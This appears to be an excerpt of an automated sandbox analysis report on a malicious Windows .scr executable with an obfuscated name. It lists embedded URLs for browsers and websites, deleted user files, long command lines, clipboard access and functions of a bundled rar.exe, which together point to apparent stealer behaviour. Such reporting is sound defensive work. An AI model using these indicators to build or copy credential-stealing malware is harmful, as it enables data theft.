Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142899018.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2136068563.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154822441.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2321848291.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87C97000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2162960886.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefox
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327717608.0000028C87630000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163201271.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C8737A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322889946.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154159134.0000028C877C5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2130602364.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323195620.0000028C877D3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877D6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877D9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2082475372.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163456438.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330698605.0000028C88140000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C87F90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88220000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2135317494.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123650876.0000028C8873A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2103806631.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.oL
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2152989212.0000028C8874D000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88284000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142899018.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88270000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2136068563.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87C97000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87C97000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2093617683.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87C97000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2135142986.0000028C8878F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2151303620.0000028C8878F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139599127.0000028C8878F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2103806631.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87C97000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2135317494.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123650876.0000028C8873A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2103806631.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/mediZ
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2135317494.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123650876.0000028C8873A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2103806631.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/favi
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2092773459.0000028C8873A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/favicons/m
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2092773459.0000028C8873A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87C74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142899018.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2136068563.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88278000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2332092681.0000028C88A42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340140316.00007FF8A9398000.00000004.00000001.01000000.00000011.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336517828.00007FF8A86A9000.00000004.00000001.01000000.00000010.sdmp String found in binary or memory: https://www.openssl.org/H
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327145319.0000028C871D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8D69000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://www.python.org/psf/license/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8C63000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://www.python.org/psf/license/)
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877E5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163201271.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322889946.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154159134.0000028C877C5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2130602364.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323195620.0000028C877D3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877E1000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326282443.0000028C877E4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877D6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877D9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2082475372.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163456438.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://yahoo.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57967
Source: unknown Network traffic detected: HTTP traffic on port 57967 -> 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.docx
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EIVQSAOTAQ.pdf
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\GIGIYTFFYT.jpg
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.xlsx
Source: cmd.exe Process created: 53

System Summary

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 3615
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E9D2C0: CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 68_2_00007FF7F7E9D2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7ECB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx, 68_2_00007FF7F7ECB57C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E89EFC 68_2_00007FF7F7E89EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7ECEEA4 68_2_00007FF7F7ECEEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E8CE84 68_2_00007FF7F7E8CE84
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EDFE74 68_2_00007FF7F7EDFE74
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E98E68 68_2_00007FF7F7E98E68
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7ECAE50 68_2_00007FF7F7ECAE50
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E8EE08 68_2_00007FF7F7E8EE08
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E91E04 68_2_00007FF7F7E91E04
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7ED1DCC 68_2_00007FF7F7ED1DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EC9D74 68_2_00007FF7F7EC9D74
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EB0D20 68_2_00007FF7F7EB0D20
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7ED6D0C 68_2_00007FF7F7ED6D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EA9D0C 68_2_00007FF7F7EA9D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E8DD04 68_2_00007FF7F7E8DD04
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EC5C8C 68_2_00007FF7F7EC5C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E98C30 68_2_00007FF7F7E98C30
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7ED9B98 68_2_00007FF7F7ED9B98
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EC4B38 68_2_00007FF7F7EC4B38
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E8CB14 68_2_00007FF7F7E8CB14
